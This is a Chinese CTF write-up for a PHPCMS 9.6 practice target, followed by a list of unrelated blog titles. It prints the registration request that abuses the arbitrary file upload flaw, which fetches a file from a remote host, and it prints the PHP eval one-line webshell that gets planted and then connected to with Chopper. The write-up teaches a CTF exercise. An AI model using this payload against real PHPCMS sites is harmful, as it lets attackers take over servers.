CTF/CTF练习平台-phpcmsV9【phpcms 9.6 漏洞利用】
来源:互联网 发布:javaweb项目源码下载 编辑:程序博客网 时间:2024/05/17 08:11
原题内容:
一个靶机而已,别搞破坏。
多谢各位大侠手下留情,flag在根目录里txt文件里
http://120.24.86.145:8001/
首先打开题目链接,可以观察到版本信息
首先想到的是,这很明显是个模板网站,百度走起,get几条有用信息
获得该模板基本目录信息
其次百度很明显可以看到phpcms漏洞信息,版本9.6的,这是很明显的信息了,先试试,不行再走普通流程(看到题目的tips说手下留情,就觉得应该是个很简单的办法,不是各种暴力手段)
这里参考了两个博客:
PHPcms9.6.0 最新版任意文件上传漏洞
Phpcms_V9任意文件上传漏洞的利用以及小小的分析
怎么说呢,这两个博客大概说懂了漏洞如何利用,但是实际操作中还是有很多问题的
下面列出自己的几个操作失误点,供大家参考:
1.第一次上传文件,我用了自己腾讯云的服务器里中的文件,一直是报错无content字段(分析一下应该是不具有腾讯云读权限,上传插入失败),改成千牛的连接就可以了
2.hackbar还是很好用的,值得推荐
接下来就上图上代码表示怎么做吧
代码:
http://120.24.86.145:8001/index.php?m=member&c=index&a=register&siteid=1
siteid=1&modelid=11&username=qwer12345&password=123456&email=wwq7123456@qq.com&info[content]=<img src=http://ovgb1c2jq.bkt.clouddn.com/1.txt#.jpg>&dosubmit=1&protocol=
至于下面post的参数怎么来的,不用多说了,用户注册界面bp来的(漏洞原理见上方参考资料)
src的上传资料来源我的网盘,文件1.txt中含有一句话木马
<?php @eval($_POST['GETF']);?>
注意,第一次是测试txt是否可以传入,从报错中明显可以看到该txt文件已经传入
第二次在上传同时用?将txt文件修改成php格式文件传入
注意,用户名,邮箱都要改变
报错信息中就是木马上传到的地址
木马上传成功,剩下就是用菜刀连接了,注入参数是GETF
顺利get flag
吐槽一下(做题的注意素质,看了答案别删了,害得我找了半天,最后我还是去别人wp找的答案)
flag{admin_a23-ae2132_key}
如果删了自取答案
注:发现一个大佬写的脚本,有兴趣的可以去看看
phpcms9-6-0 一键getshell工具
- CTF/CTF练习平台-phpcmsV9【phpcms 9.6 漏洞利用】
- CTF-练习平台 WriteUp
- CTF/CTF练习平台-各种绕过哟【sha1数组类型比较漏洞】
- CTF/CTF练习平台-flag在index里【php://filter的利用】
- bugku CTF练习平台writeup
- CTF/CTF练习平台-前女友【弱类型】
- CTF/CTF练习平台-成绩查询【sqlmap post方法】
- CTF/CTF练习平台-login1【sql约束攻击】
- CTF-PWN之fsp-utilize漏洞利用
- CTF-练习平台writeup【持续更新】
- bugku CTF-练习平台 部分writeup
- CTF练习平台 JavaScript ”点击一万次“ writeup
- CTF练习平台sql注入测试writeup
- CTF
- ctf
- ctf
- ctf
- CTF
- SSM配置之二SpringMVC
- xftp连接阿里云失败
- UVA
- 原生解析方式下的生成数据
- python中opencv,cv2.pyd下载
- CTF/CTF练习平台-phpcmsV9【phpcms 9.6 漏洞利用】
- AngularJS进阶(四十一)AngularJS中使用Chart.js制折线图与饼图实例
- 表达式计算
- MarkDown初次练习
- php中 implode() 和explode()的区别
- Windows语音朗读测试
- 寻找大富翁
- 对抗神经网络模型(GANs)作为当下最火的神经网络模型
- R:绘图-彩色饼图等